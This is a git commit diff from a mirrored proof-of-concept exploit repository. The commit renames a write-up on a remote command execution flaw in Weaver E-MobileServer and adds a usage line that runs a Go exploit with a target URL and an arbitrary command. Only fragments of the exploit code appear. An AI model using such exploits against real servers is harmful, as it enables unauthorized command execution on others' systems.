mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Update and rename 泛微移动办公OA远程命令执行漏洞.md to 泛微E-MobileServer远程命令执行漏洞.md
This commit is contained in:
parent
745ba8bcb3
commit
2c93808f5c
@ -1,5 +1,5 @@
|
|||||||
|
|
||||||
## 泛微移动办公OA远程命令执行漏洞
|
## 泛微E-MobileServer远程命令执行漏洞
|
||||||
|
|
||||||
## go语言 poc
|
## go语言 poc
|
||||||
```go
|
```go
|
||||||
@ -69,3 +69,5 @@ func getParam() (t, c string) {
|
|||||||
return hflag.GetString("target"), hflag.GetString("command")
|
return hflag.GetString("target"), hflag.GetString("command")
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
## poc使用
|
||||||
|
```go run poc.go -t http://目标 -c 执行命令```
|
||||||
Loading…
x
Reference in New Issue
Block a user